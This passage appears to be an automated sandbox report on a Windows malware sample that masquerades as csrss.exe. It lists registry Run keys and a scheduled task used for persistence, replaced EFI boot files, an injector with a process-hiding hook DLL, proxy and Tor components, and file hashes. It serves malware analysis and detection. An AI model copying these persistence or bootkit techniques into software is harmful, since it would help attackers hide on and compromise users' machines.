                                                          • Execution Graph export aborted for target csrss.exe, PID 4840 because there are no executed function
                                                          • Execution Graph export aborted for target csrss.exe, PID 6892 because there are no executed function
                                                          • Execution Graph export aborted for target csrss.exe, PID 7120 because there are no executed function
                                                          • Execution Graph export aborted for target csrss.exe, PID 768 because there are no executed function
                                                          • Execution Graph export aborted for target csrss.exe, PID 8952 because there are no executed function
                                                          • Execution Graph export aborted for target csrss.exe, PID 9120 because there are no executed function
                                                          • Execution Graph export aborted for target kdsyitkxmS.exe, PID 4688 because there are no executed function
                                                          • Execution Graph export aborted for target kdsyitkxmS.exe, PID 8716 because there are no executed function
                                                          • Execution Graph export aborted for target tor.exe, PID 6028 because there are no executed function
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          11:31:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Windows\rss\csrss.exe"
                                                          11:31:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Windows\rss\csrss.exe"
                                                          11:31:18Task SchedulerRun new task: csrss path: C:\Windows\rss\csrss.exe

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASNs

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          B:\EFI\Boot\old.efi (copy)

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:MS-DOS executable PE32+ executable (DLL) (EFI application) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):7680
                                                          Entropy (8bit):4.486535052248291
                                                          Encrypted:false
                                                          SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                          MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                          SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                          SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                          SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                          B:\EFI\Microsoft\Boot\fw.efi (copy)

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:MS-DOS executable PE32+ executable (DLL) (EFI application) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):7680
                                                          Entropy (8bit):4.486535052248291
                                                          Encrypted:false
                                                          SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                          MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                          SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                          SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                          SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                          C:\EFI\Boot\EfiGuardDxe.efi

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:MS-DOS executable PE32+ executable (DLL) (EFI runtime driver) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):279552
                                                          Entropy (8bit):4.553173975914215
                                                          Encrypted:false
                                                          SSDEEP:3072:ekODsOuozgl9aXsRzZZZZrUhFapDL4k2yntc:ekeklesRD6yt
                                                          MD5:2B84CB96AE6280C2020FA46E4A8A07D8
                                                          SHA1:E920E40CFC0C6A805D657C8F23F9C0612CD39F59
                                                          SHA-256:01E86A4DFE6E0DE7857B3CF2FAFD041C8B3A3241E00844CB6BFBD3BFAE2D36BC
                                                          SHA-512:F1A6598116F78FBA1F9531301A7313AC204BAB3B7AEBC299F69F2ED406F4EDAFC3410DB860E93D0DC7C24398F5A7FF595764400F31A3A06679FD6EC0EFB116D9
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ..............................................................................................................................................................................................PE..d................." ................x........................................................................................................................P...............p.......................................................................................text.............................. ..h.data..............................@....pdata.......P.......8..............@..H.xdata..X....`.......<..............@..B.reloc.......p.......B..............@..B........................................................................................................................................................................................................................................................................................................................................................

                                                          C:\EFI\Boot\bootx64.efi

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:MS-DOS executable PE32+ executable (DLL) (EFI application) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):7680
                                                          Entropy (8bit):4.486535052248291
                                                          Encrypted:false
                                                          SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                          MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                          SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                          SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                          SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                          C:\EFI\Microsoft\Boot\bootmgfw.efi

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:MS-DOS executable PE32+ executable (DLL) (EFI application) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):7680
                                                          Entropy (8bit):4.486535052248291
                                                          Encrypted:false
                                                          SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                          MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                          SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                          SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                          SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2148
                                                          Entropy (8bit):5.357107632174724
                                                          Encrypted:false
                                                          SSDEEP:48:kfWSGfs4c4RQmFoUefamfgZ9tK8NPb17Iu1iMugegyV/gXdUyugHc:kfLGHcIFKLfbIZ2KRLugrgg8
                                                          MD5:87B7FE779C0D77A128E368629B44A4E4
                                                          SHA1:8866E5A32F6013F6699A06DD67237DF174A6E26D
                                                          SHA-256:EE4A626195B52599B25E50A1578BEAA0EBCECF1832DA1789201B8C53119A1A26
                                                          SHA-512:779454332D671B186C23648CBA6F1B7C690705EB60CBA95B99037920C14B9BEDD92BCC719E3FC95D06CB42D8B1164CD27497875226278721C8A011E4B2E746FD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:@...e.......................E.D.D.......'.......................P................1]...E.....^.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0...............I.....B..ZR............System..4......................A....E..........System.Core.D................g$H..K..I.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4..................%`99B....9...........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0uibbw2n.u0u.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gkzpulr.xo3.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajj1lsit.dlx.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gyaqtjvj.20x.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0v4qict.nfz.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ko53wgif.wdf.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_krlqmr0f.alj.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mlnhpbeb.3a4.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rci1q53k.l45.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v0csvqjz.0mw.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vo50bj3f.c2o.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vsxja3qu.dio.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnlrizwa.4cp.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y5wemjya.mmm.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybf3cx44.ob0.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycup24wz.ubg.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):101376
                                                          Entropy (8bit):5.951577458824018
                                                          Encrypted:false
                                                          SSDEEP:3072:U3JJpaHtGsxJZ7zmaUMf2ETb4w1GMYbuT:csTF5U3EfndT
                                                          MD5:09031A062610D77D685C9934318B4170
                                                          SHA1:880F744184E7774F3D14C1BB857E21CC7FE89A6D
                                                          SHA-256:778BD69AF403DF3C4E074C31B3850D71BF0E64524BEA4272A802CA9520B379DD
                                                          SHA-512:9A276E1F0F55D35F2BF38EB093464F7065BDD30A660E6D1C62EED5E76D1FB2201567B89D9AE65D2D89DC99B142159E36FB73BE8D5E08252A975D50544A7CDA27
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 88%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b..............k......k......k..r...w......w......w......k............. w...... w...... w......Rich............PE..d...o.D`.........." ................$/....................................................`..................................................g..(...............p...............<....W..8...........................@W..8............................................text............................... ..`.rdata.............................@..@.data................d..............@....pdata..p............p..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):288256
                                                          Entropy (8bit):6.31266455792162
                                                          Encrypted:false
                                                          SSDEEP:3072:qbHszDaOJ8u2HHFIWr6e29kOnK7qFQ8wMii5I7kGvNjzMuszHshoY46bEydJ+dK9:SA3IlIA6e29vngqS8wMmuooh8z+8F
                                                          MD5:D98E33B66343E7C96158444127A117F6
                                                          SHA1:BB716C5509A2BF345C6C1152F6E3E1452D39D50D
                                                          SHA-256:5DE4E2B07A26102FE527606CE5DA1D5A4B938967C9D380A3C5FE86E2E34AAAF1
                                                          SHA-512:705275E4A1BA8205EB799A8CF1737BC8BA686925E52C9198A6060A7ABEEE65552A85B814AC494A4B975D496A63BE285F19A6265550585F2FC85824C42D7EFAB5
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................|..............................................t...........Rich...................PE..d...l.D`..........".................T..........@..........................................`.....................................................(............`...'..............`...@...8...............................8............................................text...H........................... ..`.rdata...9.......:..................@..@.data...`....0......................@....pdata...'...`...(..................@..@_RDATA...............V..............@..@.rsrc................X..............@..@.reloc..`............Z..............@..B........................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):7344128
                                                          Entropy (8bit):6.357813724347352
                                                          Encrypted:false
                                                          SSDEEP:49152:1DFOHg877aK8TVGV5KQcBZizR/BLzTu7AXiyaxI8XqHgN12StmcOr2Ot65At1/jX:1FO8HZYBBLzTG5IWzf26eCS/jJDPFfJ
                                                          MD5:61275FE567B258A897943911C450E57E
